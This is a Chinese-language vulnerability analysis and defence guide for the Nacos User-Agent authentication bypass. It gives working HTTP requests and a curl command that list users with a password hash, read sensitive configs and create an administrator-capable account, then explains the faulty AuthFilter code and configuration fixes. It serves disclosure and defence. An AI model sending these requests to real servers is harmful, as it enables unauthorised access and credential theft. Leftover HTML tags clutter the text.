Nacos 鉴权绕过漏洞分析与防御指南<\/h1>

1. Nacos 简介<\/h2>

Nacos 是一个动态服务发现、配置和服务管理平台，用于构建云原生应用和服务基础设施。主要功能包括：<\/p>

服务发现与健康监测<\/li>
动态配置管理<\/li>
服务元数据与流量管理<\/li>

支持多种服务类型：Kubernetes Service、gRPC & Dubbo RPC Service、Spring Cloud RESTful Service等<\/li> <\/ul>

2. 漏洞概述<\/h2>

Nacos 存在一个由于不当处理 User-Agent 和 URL 路径导致的鉴权绕过漏洞，攻击者可利用该漏洞：<\/p>

绕过身份验证获取用户列表<\/li>
查看敏感配置信息（如数据库密码）<\/li>
创建新用户账户<\/li>

获取系统管理权限<\/li> <\/ol>

影响版本<\/h3>

Nacos <= 2.0.0-ALPHA.1<\/li> <\/ul>

3. 漏洞验证方法<\/h2>

3.1 检测目标是否为 Nacos<\/h3>

请求：<\/p>

GET \/nacos\/ HTTP\/1.1
Host: 10.0.0.22:8848
User-Agent: Nacos-Server
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
<\/code><\/pre>
响应中包含 <title>Nacos<\/title><\/code> 即可确认目标为 Nacos。<\/p>
3.2 获取用户列表<\/h3>
请求：<\/p>
GET \/nacos\/v1\/auth\/users?pageNo=1&pageSize=900 HTTP\/1.1
Host: 10.0.0.22:8848
User-Agent: Nacos-Server
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
<\/code><\/pre>
响应示例：<\/p>
{
<\/span><\/span>  "totalCount"<\/span>:1<\/span>,
<\/span><\/span>  "pageNumber"<\/span>:1<\/span>,
<\/span><\/span>  "pagesAvailable"<\/span>:1<\/span>,
<\/span><\/span>  "pageItems"<\/span>:[
<\/span><\/span>    {
<\/span><\/span>      "username"<\/span>:"nacos"<\/span>,
<\/span><\/span>      "password"<\/span>:"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"<\/span>
<\/span><\/span>    }
<\/span><\/span>  ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>默认账号为 nacos<\/code>，默认密码为 nacos<\/code>（密码为 bcrypt 哈希）。<\/p>
3.3 查看敏感配置<\/h3>
请求：<\/p>
GET \/nacos\/v1\/cs\/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=dev&search=accurate HTTP\/1.1
Host: 10.0.0.22:8848
User-Agent: Nacos-Server
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
<\/code><\/pre>
可能获取到数据库密码等敏感信息。<\/p>
3.4 创建新用户<\/h3>
使用 curl 命令：<\/p>
curl -XPOST 'http:\/\/127.0.0.1:8848\/nacos\/v1\/auth\/users?username=test&password=test'<\/span> -H 'User-Agent: Nacos-Server'<\/span>
<\/span><\/span><\/code><\/pre>或发送 HTTP 请求：<\/p>
POST \/nacos\/v1\/auth\/users HTTP\/1.1
Host: 10.0.0.22:8848
User-Agent: Nacos-Server
Accept: application\/json, text\/plain, *\/*
Content-Type: application\/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 27

username=test&password=test
<\/code><\/pre>
成功响应：<\/p>
{"code"<\/span>:200<\/span>,"message"<\/span>:"create user ok!"<\/span>,"data"<\/span>:null<\/span>}
<\/span><\/span><\/code><\/pre>4. 漏洞分析<\/h2>
漏洞位于 com.alibaba.nacos.core.auth.AuthFilter#doFilter<\/code> 方法中：<\/p>
public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response,<\/span> FilterChain chain)<\/span> 
<\/span><\/span>    throws<\/span> IOException,<\/span> ServletException {<\/span>
<\/span><\/span>    
<\/span><\/span>    if<\/span> (!<\/span>authConfigs.<\/span>isAuthEnabled<\/span>())<\/span> {<\/span>
<\/span><\/span>        chain.<\/span>doFilter<\/span>(<\/span>request,<\/span> response);<\/span>
<\/span><\/span>        return<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    HttpServletRequest req =<\/span> (<\/span>HttpServletRequest)<\/span> request;<\/span>
<\/span><\/span>    HttpServletResponse resp =<\/span> (<\/span>HttpServletResponse)<\/span> response;<\/span>
<\/span><\/span>    
<\/span><\/span>    if<\/span> (<\/span>authConfigs.<\/span>isEnableUserAgentAuthWhite<\/span>())<\/span> {<\/span>
<\/span><\/span>        String userAgent =<\/span> WebUtils.<\/span>getUserAgent<\/span>(<\/span>req);<\/span>
<\/span><\/span>        if<\/span> (<\/span>StringUtils.<\/span>startsWith<\/span>(<\/span>userAgent,<\/span> Constants.<\/span>NACOS_SERVER_HEADER<\/span>))<\/span> {<\/span>
<\/span><\/span>            chain.<\/span>doFilter<\/span>(<\/span>request,<\/span> response);<\/span>
<\/span><\/span>            return<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ... 其他代码
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.1 主要问题点<\/h3>


User-Agent 白名单绕过<\/strong>：<\/p>

默认 authConfigs.isEnableUserAgentAuthWhite()<\/code> 为 true<\/li>
当 User-Agent 以 "Nacos-Server" 开头时，直接跳过鉴权<\/li>
<\/ul>
<\/li>

路径解析问题<\/strong>：<\/p>

通过特殊构造 URL 路径（如添加末尾斜杠）可使 methodsCache.getMethod(req)<\/code> 返回 null<\/li>
导致绕过后续鉴权逻辑<\/li>
<\/ul>
<\/li>

修复机制缺陷<\/strong>：<\/p>

即使配置了 nacos.core.auth.server.identity.key<\/code> 和 nacos.core.auth.server.identity.value<\/code><\/li>
在不匹配时未正确处理拒绝访问逻辑<\/li>
<\/ul>
<\/li>
<\/ol>
5. 实际攻击案例<\/h2>

攻击者发现开源博客项目使用 Nacos<\/li>
通过漏洞获取配置信息，包含 MySQL 和 Redis 的明文密码<\/li>
利用开放的 3306 端口直接连接数据库<\/li>
获取或篡改数据库内容<\/li>
<\/ol>
6. 修复方案<\/h2>
在 conf\/application.properties<\/code> 中配置：<\/p>
# 开启鉴权
nacos.core.auth.enabled=true

# 关闭白名单功能
nacos.core.auth.enable.userAgentAuthWhite=false

# 配置自定义键值对
nacos.core.auth.server.identity.key=自定义键
nacos.core.auth.server.identity.value=自定义值
<\/code><\/pre>
6.1 修复步骤详解<\/h3>


启用鉴权<\/strong>：<\/p>
nacos.core.auth.enabled=true
<\/code><\/pre>
<\/li>

禁用 User-Agent 白名单<\/strong>：<\/p>
nacos.core.auth.enable.userAgentAuthWhite=false
<\/code><\/pre>
<\/li>

配置自定义身份验证<\/strong>：<\/p>
nacos.core.auth.server.identity.key=aaanacos.core.auth.server.identity.value=bbb
<\/code><\/pre>

键值对可自定义<\/li>
确保在生产环境使用强密码<\/li>
<\/ul>
<\/li>

升级到最新版本<\/strong>：<\/p>

升级到 Nacos 2.0.0-ALPHA.1 以上版本<\/li>
<\/ul>
<\/li>
<\/ol>
7. 安全建议<\/h2>


最小权限原则<\/strong>：<\/p>

限制 Nacos 管理界面的访问IP<\/li>
使用防火墙规则限制访问端口<\/li>
<\/ul>
<\/li>

密码安全<\/strong>：<\/p>

修改默认账号密码<\/li>
使用强密码策略<\/li>
<\/ul>
<\/li>

配置加密<\/strong>：<\/p>

对敏感配置信息进行加密存储<\/li>
避免在配置中存储明文密码<\/li>
<\/ul>
<\/li>

网络隔离<\/strong>：<\/p>

将 Nacos 部署在内网环境<\/li>
避免将数据库等服务端口暴露到公网<\/li>
<\/ul>
<\/li>

定期审计<\/strong>：<\/p>

检查用户列表和权限设置<\/li>
监控异常登录行为<\/li>
<\/ul>
<\/li>
<\/ol>
8. 总结<\/h2>
Nacos 鉴权绕过漏洞是一个严重的安全问题，攻击者可利用该漏洞完全控制系统。通过正确配置鉴权参数、禁用危险功能并及时升级，可以有效防御此类攻击。管理员应定期检查系统安全配置，确保遵循最佳安全实践。<\/p>